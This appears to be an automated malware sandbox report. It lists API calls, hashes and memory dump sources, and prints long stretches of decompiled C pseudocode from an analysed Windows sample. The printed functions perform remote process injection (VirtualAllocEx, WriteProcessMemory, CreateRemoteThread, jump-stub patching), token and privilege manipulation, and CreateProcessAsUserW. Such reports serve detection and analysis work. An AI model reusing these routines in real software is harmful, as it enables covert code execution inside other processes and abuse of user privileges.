0x006ec6f8
0x006ec6fe
0x006ec702
0x006ec70b
0x006ec713
0x006ec715
0x006ec715
0x006ec71e

APIs

LdrLoadDll.NTDLL(00000000,00000000,?), ref: 006EC70B

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 0500e327e78335092646379dbc2ed27fb3d43ad0c253ab3e325a0bceda7e84e6
Instruction ID: a1f587190c8e29a6cab4c8bd97d3dd2191830e02c7ad10f7152fdb515233b88a
Opcode Fuzzy Hash: 0500e327e78335092646379dbc2ed27fb3d43ad0c253ab3e325a0bceda7e84e6
Instruction Fuzzy Hash: 89F08C706012208BC324AF28E806AA7B7F8EF45720F06C54DE4888B250E7759889CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00671317, Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

v, xrefs: 006712E2

Memory Dump Source

Source File: 00000003.00000002.541788212.00671000.00000040.00000001.sdmp, Offset: 00671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_671000_______.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: d3366b6ad397d8bc6a71c2148f8272326a51d15007729fa0a8038f12376e4e3e
Instruction ID: 42d1a18bf3c090f398c019b3bd3c542596280add00143b98184c7376b9464d51
Opcode Fuzzy Hash: d3366b6ad397d8bc6a71c2148f8272326a51d15007729fa0a8038f12376e4e3e
Instruction Fuzzy Hash: 0F5114B6504245DFCB08DF28D8459EABBA5FF85320B14C69EE859CF242D730E982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 006E5A50, Relevance: 1.4, APIs: 1, Instructions: 102sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000003E8), ref: 006E5B3B

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b9bc7914662039c20b9b1096c4869bbad6270f533c797a4298eda038e6076814
Instruction ID: 46694503378d2b8e9aaeb13b9d5ec6f3deb31bfc2a795b3f0c39a1b9183dafff
Opcode Fuzzy Hash: b9bc7914662039c20b9b1096c4869bbad6270f533c797a4298eda038e6076814
Instruction Fuzzy Hash: 20312AB0600B41AFE7249F26DC59F77B7EEEF44745F14882DA58AD2290EA31E841CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00671345, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.541788212.00671000.00000040.00000001.sdmp, Offset: 00671000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_671000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
Instruction ID: 934872282c042806c04a2fafbac6b478198cacce32688aba0a959f352f854aa9
Opcode Fuzzy Hash: 3450aab041393e21055acff7db49d0c688983fa3b6482a17dc266aaa19373bdd
Instruction Fuzzy Hash: C5418D75200249DFDB08CF28D8499AABBA5FF49320B20C659F959CF382D730E942CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 006E1250, Relevance: 70.4, APIs: 38, Strings: 2, Instructions: 363
libraryloaderinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006E1250(void* __ecx, void* __eflags, void* _a4, intOrPtr _a8) {
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v114;
				char _v116;
				char _v316;
				void* _v320;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				void* _v428;
				void* _v432;
				void _v436;
				void* _v444;
				void* _v448;
				_Unknown_base(*)()* _v452;
				intOrPtr _v456;
				void* _v460;
				void* _t120;
				void* _t136;
				struct HINSTANCE__* _t142;
				void* _t163;
				void* _t165;
				void* _t167;
				intOrPtr _t173;
				long _t180;
				WCHAR* _t181;
				SIZE_T* _t187;
				void* _t197;
				SIZE_T* _t204;
				void* _t206;
				intOrPtr* _t207;
				void* _t211;
				SIZE_T* _t213;

				_t206 = __ecx;
				_t197 = 0;
				E006F6610( &_v452, 0, 0x1b4);
				_t213 =  &(( &_v444)[3]);
				if( *((intOrPtr*)(_t206 + 0x7c)) != 0) {
					L35:
					return _t197;
				}
				 *(_t206 + 0x88) = CreateEventW(0, 0, 0, 0);
				 *(_t206 + 0x8c) = CreateEventW(0, 0, 0, 0);
				 *(_t206 + 0x90) = CreateEventW(0, 1, 1, 0);
				 *((intOrPtr*)(_t206 + 0x70)) = _a4;
				_v456 = _a8;
				 *((intOrPtr*)(_t206 + 0x74)) = _a8;
				if(DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x88), _a4,  &_v436, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x8c), _a4,  &_v432, 0, 0, 2) == 0 || DuplicateHandle(GetCurrentProcess(),  *(_t206 + 0x90), _a4,  &_v428, 0, 0, 2) == 0) {
					L23:
					_t197 = _v444;
					if(_t197 == 0) {
						CloseHandle( *(_t206 + 0x88));
						CloseHandle( *(_t206 + 0x8c));
						CloseHandle( *(_t206 + 0x90));
						if(_v436 != 0) {
							DuplicateHandle(_a4, _v436, GetCurrentProcess(), 0, 0, 0, 3);
						}
						if(_v432 != 0) {
							DuplicateHandle(_a4, _v432, GetCurrentProcess(), 0, 0, 0, 3);
						}
						if( *(_t206 + 0x90) != 0) {
							DuplicateHandle(_a4, _v428, GetCurrentProcess(), 0, 0, 0, 3);
						}
						if(_v452 != 0) {
							VirtualFreeEx(_a4, _v452, E006EA3A0(), 0x8000);
						}
						_t120 = _v448;
						_t207 = _t206 + 0x88;
						if(_t120 != 0) {
							VirtualFreeEx(_a4, _t120, 0x70, 0x8000);
						}
						 *((intOrPtr*)(_t207 + 0x10)) = 0;
						 *((intOrPtr*)(_t207 + 0xc)) = 0;
						 *((intOrPtr*)(_t207 + 8)) = 0;
						 *((intOrPtr*)(_t207 + 4)) = 0;
						 *_t207 = 0;
						_t197 = _v444;
					}
					goto L35;
				} else {
					_t136 = VirtualAllocEx(_a4, 0, E006EA3A0(), 0x3000, 0x40);
					_v452 = _t136;
					if(_t136 == 0) {
						goto L23;
					}
					_t180 = E006EA3A0();
					_t187 = _t213;
					 *_t187 = 0;
					if(WriteProcessMemory(_a4, _v452, E006EA290, _t180, _t187) == 0 || _v460 != _t180) {
						goto L23;
					} else {
						_t181 =  &_v316;
						 *((intOrPtr*)(_t181 - 0x4c)) = 0;
						 *((intOrPtr*)(_t181 - 0x48)) = 0;
						 *((intOrPtr*)(_t181 - 0x24)) = 0;
						E006F4520(_t181, 0x56);
						_t142 = GetModuleHandleW(_t181);
						_t211 =  &_v116;
						 *(_t181 - 8) = _t142;
						E006F7160(_t211, 0x6e);
						 *((intOrPtr*)(_t181 - 0x6c)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x6f);
						 *((intOrPtr*)(_t181 - 0x68)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x70);
						 *((intOrPtr*)(_t181 - 0x64)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x71);
						 *((intOrPtr*)(_t181 - 0x60)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x72);
						 *((intOrPtr*)(_t181 - 0x5c)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x73);
						 *((intOrPtr*)(_t181 - 0x50)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x74);
						 *((intOrPtr*)(_t181 - 0x58)) = GetProcAddress( *(_t181 - 8), _t211);
						E006F7160(_t211, 0x75);
						 *((intOrPtr*)(_t181 - 0x54)) = GetProcAddress( *(_t181 - 8), _t211);
						_t204 =  &(_t213[0x12]);
						if( *((intOrPtr*)(_t181 - 0x6c)) == 0 || _v420 == 0 || _v416 == 0 || _v412 == 0) {
							goto L23;
						} else {
							_t163 = VirtualAllocEx(_a4, 0, 0x70, 0x3000, 0x40);
							_v448 = _t163;
							if(_t163 == 0) {
								goto L23;
							}
							_v460 = 0;
							if(WriteProcessMemory(_a4, _t163,  &_v436, 0x70, _t204) == 0 || _v460 != 0x70) {
								goto L23;
							} else {
								_t165 = E006F1800(_a4);
								_v444 = _t165;
								if(_t165 == 0) {
									goto L23;
								}
								if( *((intOrPtr*)(_t206 + 0x78)) == 0) {
									_t167 = CreateRemoteThread(_a4, 0, 0, _v452, _v448, 4, 0);
									_v460 = _t167;
									if(_t167 == 0) {
										goto L23;
									}
									L20:
									ResetEvent( *(_t206 + 0x8c));
									ResetEvent( *(_t206 + 0x88));
									if(ResumeThread(_v460) != 0 && E006EB710(_t170, _t206) != 0) {
										 *((intOrPtr*)(_t206 + 0x94)) = _v452;
										_t173 = _v456;
										 *((intOrPtr*)(_t206 + 0x98)) = _t173;
										 *((intOrPtr*)(_t206 + 0x9c)) = _t173 +  ~E006EA290 + E006EA350;
										 *((intOrPtr*)(_t206 + 0x7c)) = 1;
										_v448 = 1;
									}
									goto L23;
								}
								_v320 = _t211;
								_v116 = 0x6858;
								_v112 = 0xe9500000;
								_v460 = 0;
								_v114 = _v448;
								_v108 = _v452 + 0xfffffff4 - _t165;
								if(WriteProcessMemory(_a4, _t165, _t211, 0xc, _t204) == 0 || _v460 != 0xc) {
									goto L23;
								} else {
									goto L20;
								}
							}
						}
					}
				}
			}

0x006e125a
0x006e125c
0x006e1269
0x006e126e
0x006e1274
0x006e170a
0x006e1716
0x006e1716
0x006e128f
0x006e129b
0x006e12aa
0x006e12b7
0x006e12be
0x006e12c9
0x006e12ee
0x006e1612
0x006e1612
0x006e1618
0x006e162a
0x006e1632
0x006e163a
0x006e1641
0x006e165c
0x006e165c
0x006e1667
0x006e1682
0x006e1682
0x006e168f
0x006e16aa
0x006e16aa
0x006e16b5
0x006e16cd
0x006e16cd
0x006e16d3
0x006e16d7
0x006e16df
0x006e16f0
0x006e16f0
0x006e16f8
0x006e16fb
0x006e16fe
0x006e1701
0x006e1704
0x006e1706
0x006e1706
0x00000000
0x006e134e
0x006e1364
0x006e136c
0x006e1370
0x00000000
0x00000000
0x006e137b
0x006e1381
0x006e1383
0x006e13a0
0x00000000
0x006e13af
0x006e13b1
0x006e13b8
0x006e13bb
0x006e13be
0x006e13c4
0x006e13cd
0x006e13d3
0x006e13da
0x006e13e0
0x006e13f4
0x006e13fa
0x006e1408
0x006e140e
0x006e141c
0x006e1422
0x006e1430
0x006e1436
0x006e1444
0x006e144a
0x006e1458
0x006e145e
0x006e146c
0x006e1472
0x006e1480
0x006e1485
0x006e148a
0x00000000
0x006e14b4
0x006e14c6
0x006e14ce
0x006e14d2
0x00000000
0x00000000
0x006e14d8
0x006e14f7
0x00000000
0x006e1507
0x006e150e
0x006e1515
0x006e1519
0x00000000
0x00000000
0x006e1523
0x006e15a3
0x006e15ab
0x006e15af
0x00000000
0x00000000
0x006e15b1
0x006e15bd
0x006e15c5
0x006e15d3
0x006e15eb
0x006e15f1
0x006e15f5
0x006e1602
0x006e160b
0x006e160e
0x006e160e
0x00000000
0x006e15d3
0x006e1525
0x006e152c
0x006e1537
0x006e1542
0x006e1554
0x006e155d
0x006e1578
0x00000000
0x00000000
0x00000000
0x00000000
0x006e1578
0x006e14f7
0x006e148a
0x006e13a0

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E128D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 006E1299
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000), ref: 006E12A8
GetCurrentProcess.KERNEL32 ref: 006E12D2
DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 006E12E6
GetCurrentProcess.KERNEL32 ref: 006E12FE
DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 006E1312
GetCurrentProcess.KERNEL32 ref: 006E132A
DuplicateHandle.KERNEL32(00000000,?,?,?,00000000,00000000,00000002), ref: 006E1340
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 006E1364
WriteProcessMemory.KERNEL32(?,?,006EA290,00000000), ref: 006E1398
GetModuleHandleW.KERNEL32(?), ref: 006E13CD
GetProcAddress.KERNEL32(?,?), ref: 006E13F2
GetProcAddress.KERNEL32(?,?), ref: 006E1406
GetProcAddress.KERNEL32(?,?), ref: 006E141A
GetProcAddress.KERNEL32(?,?), ref: 006E142E
GetProcAddress.KERNEL32(?,?), ref: 006E1442
GetProcAddress.KERNEL32(?,?), ref: 006E1456
GetProcAddress.KERNEL32(?,?), ref: 006E146A
GetProcAddress.KERNEL32(?,?), ref: 006E147E
VirtualAllocEx.KERNEL32(?,00000000,00000070,00003000,00000040), ref: 006E14C6
WriteProcessMemory.KERNEL32(?,00000000,?,00000070), ref: 006E14EF

Part of subcall function 006F1800: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 006F181C
Part of subcall function 006F1800: ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 006F1842
Part of subcall function 006F1800: ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 006F1869
Part of subcall function 006F1800: ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 006F1893

WriteProcessMemory.KERNEL32(?,00000000,?,0000000C), ref: 006E1570
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,00000000), ref: 006E15A3
ResetEvent.KERNEL32(?), ref: 006E15BD
ResetEvent.KERNEL32(?), ref: 006E15C5
ResumeThread.KERNEL32(?), ref: 006E15CB
CloseHandle.KERNEL32(?), ref: 006E162A
CloseHandle.KERNEL32(?), ref: 006E1632
CloseHandle.KERNEL32(?), ref: 006E163A
GetCurrentProcess.KERNEL32 ref: 006E1643
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 006E165C
GetCurrentProcess.KERNEL32 ref: 006E1669
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 006E1682
GetCurrentProcess.KERNEL32 ref: 006E1691
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 006E16AA
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 006E16CD
VirtualFreeEx.KERNEL32(?,?,00000070,00008000), ref: 006E16F0

Strings

Xh, xrefs: 006E152C
p, xrefs: 006E14FD

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Process$Handle$AddressProc$CurrentDuplicateMemory$Event$CreateVirtual$CloseReadWrite$AllocFreeResetThread$InformationModuleQueryRemoteResume
String ID: Xh$p
API String ID: 2079587854-3369398867
Opcode ID: b454c1dfa6aac696573dba07aa76b2698031b7fa4e551fa383d32f8b84975e7e
Instruction ID: f6f661727e7152bdba8bbcbfd561866ea3f69c5c7bade369b83dd1fc7142f801
Opcode Fuzzy Hash: b454c1dfa6aac696573dba07aa76b2698031b7fa4e551fa383d32f8b84975e7e
Instruction Fuzzy Hash: 72D14D70604344AFE7219F25DC49FABBBEAFF85340F14482DF9899A260DB71A944DF21

Uniqueness

Uniqueness Score: -1.00%

Function 006E5470, Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 350
processmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E006E5470(intOrPtr _a20) {
				int _v0;
				long _v28;
				WCHAR* _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				char _v552;
				short _v1064;
				char _v1240;
				char _v1272;
				void _v1316;
				void* _v1320;
				struct _STARTUPINFOW _v1428;
				union _SID_NAME_USE _v1444;
				long _v1448;
				long _v1452;
				long _v1456;
				long _v1460;
				long _v1464;
				long _v1468;
				long _v1472;
				char _v1476;
				intOrPtr _v1480;
				struct _SID_IDENTIFIER_AUTHORITY _v1484;
				long _v1488;
				char _v1492;
				long _v1496;
				void* _v1500;
				long _v1504;
				void* _v1508;
				void* _v1512;
				void* _v1516;
				void* _v1520;
				long _v1524;
				intOrPtr _v1528;
				void* _v1532;
				char _v1536;
				void* _v1540;
				void* _v1544;
				void* _v1548;
				intOrPtr _v1556;
				void* _v1568;
				int _t95;
				intOrPtr _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t99;
				intOrPtr _t107;
				int _t110;
				int _t112;
				int _t114;
				long _t115;
				void** _t116;
				int _t117;
				DWORD* _t118;
				int _t119;
				int _t120;
				int _t122;
				int _t125;
				int _t128;
				int _t130;
				int _t131;
				int _t132;
				void* _t134;
				struct _TOKEN_PRIVILEGES* _t147;
				DWORD* _t150;
				WCHAR* _t151;
				char* _t152;
				struct _STARTUPINFOW* _t153;
				int _t155;
				long _t158;
				int _t164;
				intOrPtr _t168;
				signed int _t174;
				void* _t176;
				void** _t178;
				WCHAR* _t179;
				union _SECURITY_IMPERSONATION_LEVEL _t180;
				intOrPtr _t181;
				intOrPtr _t182;
				void* _t186;
				void* _t187;
				HANDLE* _t189;
				void* _t191;

				_t189 =  &_v1508;
				_t168 =  *0x6f9a8c; // 0x0
				_t180 = 0;
				_t153 =  &(_v1428.dwFlags);
				_v1516 = 0xffffffff;
				_v1484.Value = 0x100;
				_v1524 = 0;
				_v1504 = 0;
				_v1508 = 0;
				_v1492 = 0;
				_v1520 = 0;
				_v1512 = 0;
				_v1496 = 0;
				_v1472 = 0;
				_t153->cb = 0x44;
				_v1476 =  *0x6f9a90 & 0x0000ffff;
				_v1480 = _t168;
				GetStartupInfoW(_t153);
				_t191 =  *0x6f9c00 - _t180; // 0x73e71f81
				_v1456 = 0;
				_v1460 = 0;
				_v1464 = 0;
				_v1468 = 0;
				if(_t191 != 0 || E006F18C0(_t153, _t191) != 0) {
					_t181 = _a20;
					_v1488 = 0;
					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1520) != 0) {
						_t179 =  &_v1240;
						E006F4520(_t179, 0x5f);
						_t189 =  &(_t189[2]);
						if(LookupPrivilegeValueW(0, _t179,  &(_v1428.dwXCountChars)) != 0) {
							_t147 =  &(_v1428.dwYSize);
							_t147->PrivilegeCount = 1;
							_t147->Privileges[0].Luid = 2;
							AdjustTokenPrivileges(_v1520, 0, _t147, 0x10,  &(_v1428.lpTitle),  &_v1488);
						}
					}
					if(_t181 == 0) {
						_t95 =  *0x6f9c4c; // 0x73e74023
						__eflags = _t95;
						if(_t95 == 0) {
							L24:
							_t155 =  *0x6f9b80; // 0x0
							__eflags = _t155;
							if(_t155 == 0) {
								L42:
								_t180 = 0;
								_t187 = 0;
								_t178 = 0;
								__eflags = 0;
								L43:
								_t96 = _v1428.lpReserved;
								if(_t96 != 0) {
									 *0x6f9e90(_v1524, _t96);
								}
								_t97 = _v1524;
								if(_t97 != 0) {
									CloseHandle(_t97);
								}
								_t98 = _v1504;
								if(_t98 != 0) {
									 *0x6f9e88(_t98);
								}
								if(_t178 != 0) {
									E006E91E0(_t187);
								}
								_t99 = _v1520;
								if(_t99 != 0) {
									AdjustTokenPrivileges(_t99, 0,  &(_v1428.lpTitle), 0x10, 0, 0);
									CloseHandle(_v1520);
								}
								goto L53;
							}
							_t107 =  *_t155();
							_t182 = _t107;
							__eflags = _t107 - 0xffffffff;
							if(_t107 == 0xffffffff) {
								goto L42;
							}
							L26:
							RevertToSelf();
							_t110 =  *0x6f9c00(_t182,  &_v1516);
							L27:
							__eflags = _t110;
							if(_t110 == 0) {
								goto L42;
							}
							_t180 = 1;
							_t112 = DuplicateTokenEx(_v1524, 0x2000000, 0, 1, 1, _t189);
							__eflags = _t112;
							if(_t112 == 0) {
								goto L42;
							}
							CloseHandle(_v1532);
							_t150 =  &_v1516;
							 *_t150 = 0;
							_t114 = GetTokenInformation(_v1540, 1, 0, 0, _t150);
							__eflags = _t114;
							_t178 = 0;
							if(_t114 == 0) {
								_t115 = GetLastError();
								__eflags = _t115 - 0x7a;
								if(_t115 != 0x7a) {
									goto L42;
								}
								_t116 = E006E3180(_v1520, 0);
								_t189 =  &(_t189[2]);
								_t178 = _t116;
								__eflags = _t116;
								if(_t116 == 0) {
									L11:
									_t180 = 0;
									_t187 = 0;
									goto L43;
								}
								_t187 = _t178;
							}
							_t117 = GetTokenInformation(_v1544, 1, _t187, _v1520, _t150);
							__eflags = _t117;
							if(_t117 == 0) {
								L38:
								_t180 = 0;
								goto L43;
							}
							_t118 =  &_v1508;
							_t151 =  &_v552;
							_v1064 = 0;
							 *_t118 = 0x100;
							 *_t151 = 0;
							_t119 = LookupAccountSidW(0,  *_t178, _t151, _t118,  &_v1064, _t118,  &_v1444);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L38;
							}
							_t120 = _v0;
							_t158 = 0;
							_v1448 = 0;
							_v1452 = 0;
							_v1456 = 0;
							_v1460 = 0;
							_v1464 = 0;
							_v1472 = 0;
							_v1476 = 0x20;
							_v1468 = _t151;
							__eflags = _t120;
							if(_t120 == 0) {
								L34:
								_t122 =  *0x6f9e84(_v1548,  &_v1476);
								__eflags = _t122;
								if(_t122 == 0) {
									goto L38;
								}
								_v1428.hStdOutput = 0;
								_t152 =  &_v1272;
								E006F4520(_t152, 0x9d);
								_t189 =  &(_t189[2]);
								_v1428.dwY = _t152;
								_t125 =  *0x6f9e8c( &_v1536, _v1556, 0);
								__eflags = _t125;
								if(_t125 == 0) {
									goto L38;
								}
								_t128 = CreateProcessAsUserW(_v1568, 0, _v32, 0, 0, 0, _v28, _v1548, 0,  &_v1428,  &_v1512);
								__eflags = _t128;
								if(_t128 == 0) {
									goto L38;
								}
								 *_v40 = _v1512;
								 *_v36 = _v1508;
								goto L43;
							} else {
								goto L33;
							}
							do {
								L33:
								_t174 =  *(_t189 + _t158 + 0x3e4) & 0x0000ffff;
								 *(_t120 + _t158) = _t174;
								_t158 = _t158 + 2;
								__eflags = _t174;
							} while (_t174 != 0);
							goto L34;
						}
						_t130 =  *_t95(0, 0, 1,  &_v1508,  &_v1492);
						__eflags = _t130;
						if(_t130 == 0) {
							goto L24;
						}
						_t131 = _v1512;
						_t182 = 0xffffffffffffffff;
						__eflags = _t131;
						if(_t131 == 0) {
							L21:
							_t132 =  *0x6f9be8; // 0x73e71b65
							__eflags = _t132;
							if(_t132 != 0) {
								 *_t132(_v1528);
							}
							__eflags = _t182 - 0xffffffff;
							if(_t182 != 0xffffffff) {
								goto L26;
							} else {
								goto L24;
							}
						}
						_t176 = 0;
						_t164 = _v1528 + 8;
						__eflags = _t164;
						while(1) {
							__eflags =  *_t164;
							if( *_t164 == 0) {
								break;
							}
							_t176 = _t176 + 1;
							_t164 = _t164 + 0xc;
							__eflags = _t176 - _t131;
							if(_t176 < _t131) {
								continue;
							}
							goto L21;
						}
						_t182 =  *((intOrPtr*)(_t164 - 8));
						goto L21;
					}
					_t134 = OpenProcess(0x1fffff, 0,  *(_t181 + 4));
					if(_t134 == 0) {
						goto L42;
					}
					_t186 = _t134;
					if(OpenProcessToken(_t186, 8,  &_v1512) == 0 || GetTokenInformation(_v1512, 1,  &_v1316, 0x4c,  &_v1472) == 0) {
						goto L42;
					} else {
						_t178 = 0;
						if(AllocateAndInitializeSid( &_v1484, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1500) == 0 || EqualSid(_v1320, _v1500) == 0) {
							CloseHandle(_v1516);
							_t110 = OpenProcessToken(_t186, 2,  &_v1520);
							goto L27;
						} else {
							goto L11;
						}
					}
				} else {
					L53:
					return _t180;
				}
			}

0x006e5474
0x006e5481
0x006e5487
0x006e5489
0x006e5490
0x006e5498
0x006e54a0
0x006e54a3
0x006e54a7
0x006e54ab
0x006e54af
0x006e54b3
0x006e54b7
0x006e54bb
0x006e54bf
0x006e54c5
0x006e54ca
0x006e54cf
0x006e54d5
0x006e54db
0x006e54df
0x006e54e3
0x006e54e7
0x006e54eb
0x006e54fa
0x006e5501
0x006e551f
0x006e5521
0x006e552b
0x006e5530
0x006e5546
0x006e5548
0x006e5554
0x006e555a
0x006e556c
0x006e556c
0x006e5546
0x006e5574
0x006e560c
0x006e5611
0x006e5613
0x006e567f
0x006e567f
0x006e5685
0x006e5687
0x006e5871
0x006e5871
0x006e5873
0x006e5875
0x006e5875
0x006e5877
0x006e5877
0x006e587d
0x006e5884
0x006e5884
0x006e588a
0x006e588f
0x006e5892
0x006e5892
0x006e5898
0x006e589e
0x006e58a1
0x006e58a1
0x006e58a9
0x006e58ac
0x006e58b1
0x006e58b4
0x006e58ba
0x006e58c9
0x006e58d3
0x006e58d3
0x00000000
0x006e58ba
0x006e568d
0x006e568f
0x006e5691
0x006e5694
0x00000000
0x00000000
0x006e569a
0x006e569a
0x006e56a6
0x006e56ac
0x006e56ac
0x006e56ae
0x00000000
0x00000000
0x006e56b8
0x006e56c7
0x006e56cd
0x006e56cf
0x00000000
0x00000000
0x006e56d9
0x006e56e1
0x006e56e5
0x006e56f0
0x006e56f6
0x006e56f8
0x006e56fd
0x006e5847
0x006e584d
0x006e5850
0x00000000
0x00000000
0x006e5858
0x006e585d
0x006e5860
0x006e5862
0x006e5864
0x006e5603
0x006e5603
0x006e5605
0x00000000
0x006e5605
0x006e586a
0x006e586a
0x006e570f
0x006e5715
0x006e5717
0x006e5843
0x006e5843
0x00000000
0x006e5843
0x006e5726
0x006e572a
0x006e5731
0x006e5737
0x006e573d
0x006e574e
0x006e5754
0x006e5756
0x00000000
0x00000000
0x006e575c
0x006e5763
0x006e5765
0x006e5769
0x006e576d
0x006e5771
0x006e5775
0x006e5779
0x006e577d
0x006e5785
0x006e5789
0x006e578b
0x006e57a1
0x006e57aa
0x006e57b0
0x006e57b2
0x00000000
0x00000000
0x006e57b8
0x006e57c2
0x006e57cf
0x006e57d4
0x006e57d7
0x006e57e9
0x006e57ef
0x006e57f1
0x00000000
0x00000000
0x006e581d
0x006e5823
0x006e5825
0x00000000
0x00000000
0x006e5839
0x006e583f
0x00000000
0x00000000
0x00000000
0x00000000
0x006e578d
0x006e578d
0x006e578d
0x006e5795
0x006e5799
0x006e579c
0x006e579c
0x00000000
0x006e578d
0x006e5625
0x006e5627
0x006e5629
0x00000000
0x00000000
0x006e562b
0x006e5631
0x006e5632
0x006e5634
0x006e566b
0x006e566b
0x006e5670
0x006e5672
0x006e5678
0x006e5678
0x006e567a
0x006e567d
0x00000000
0x00000000
0x00000000
0x00000000
0x006e567d
0x006e563a
0x006e563c
0x006e563c
0x006e563f
0x006e563f
0x006e5642
0x00000000
0x00000000
0x006e5644
0x006e5645
0x006e5648
0x006e564a
0x00000000
0x00000000
0x00000000
0x006e564c
0x006e5668
0x00000000
0x006e5668
0x006e5584
0x006e558c
0x00000000
0x00000000
0x006e5592
0x006e55a4
0x00000000
0x006e55cd
0x006e55d1
0x006e55ec
0x006e5652
0x006e5660
0x00000000
0x00000000
0x00000000
0x00000000
0x006e55ec
0x006e58d9
0x006e58d9
0x006e58e5
0x006e58e5

APIs

GetStartupInfoW.KERNEL32(?), ref: 006E54CF
GetCurrentProcess.KERNEL32 ref: 006E5509
OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 006E5517
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E553E
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?), ref: 006E556C
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 006E5584
OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 006E559C
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 006E55BF
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E55E4
EqualSid.ADVAPI32(?,?), ref: 006E55F9
CloseHandle.KERNEL32(?), ref: 006E5892

Part of subcall function 006F18C0: LoadLibraryW.KERNEL32(?), ref: 006F18DC
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F18FD
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1911
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1925
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1939

CloseHandle.KERNEL32(?), ref: 006E5652
OpenProcessToken.ADVAPI32(00000000,00000002,FFFFFFFF), ref: 006E5660
RevertToSelf.ADVAPI32 ref: 006E569A
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001), ref: 006E56C7
CloseHandle.KERNEL32(FFFFFFFF), ref: 006E56D9
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 006E56F0
